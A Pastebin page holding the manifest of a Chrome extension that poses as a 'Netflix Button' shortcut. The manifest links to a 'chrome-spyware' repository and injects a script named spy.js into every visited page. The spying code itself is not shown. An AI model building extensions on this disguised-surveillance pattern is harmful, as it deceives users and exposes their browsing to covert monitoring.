Advertisement
FlyFar

extension/manifest.json

Aug 19th, 2023
728
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JSON 0.63 KB | Cybersecurity | 0 0
  1. {
  2.   "manifest_version": 2,
  3.   "name": "Netflix Button",
  4.   "description": "Shortcut to Netflix on Chrome!",
  5.   "version": "1.0",
  6.   "homepage_url": "https://github.com/719Ben/chrome-spyware",
  7.   "icons": {
  8.     "16": "icon16.png",
  9.     "48": "icon48.png",
  10.     "128": "icon128.png"
  11.   },
  12.   "browser_action": {
  13.     "default_icon": "icon16.png",
  14.     "default_title": "Open Netflix!"
  15.   },
  16.   "background": {
  17.     "scripts": [
  18.       "background.js"
  19.     ],
  20.     "persistent": false
  21.   },
  22.   "permissions": [
  23.     "tabs",
  24.     "storage"
  25.   ],
  26.   "content_scripts": [
  27.     {
  28.       "matches": ["<all_urls>"],
  29.       "js": ["spy.js"]
  30.     }
  31.   ]
  32. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement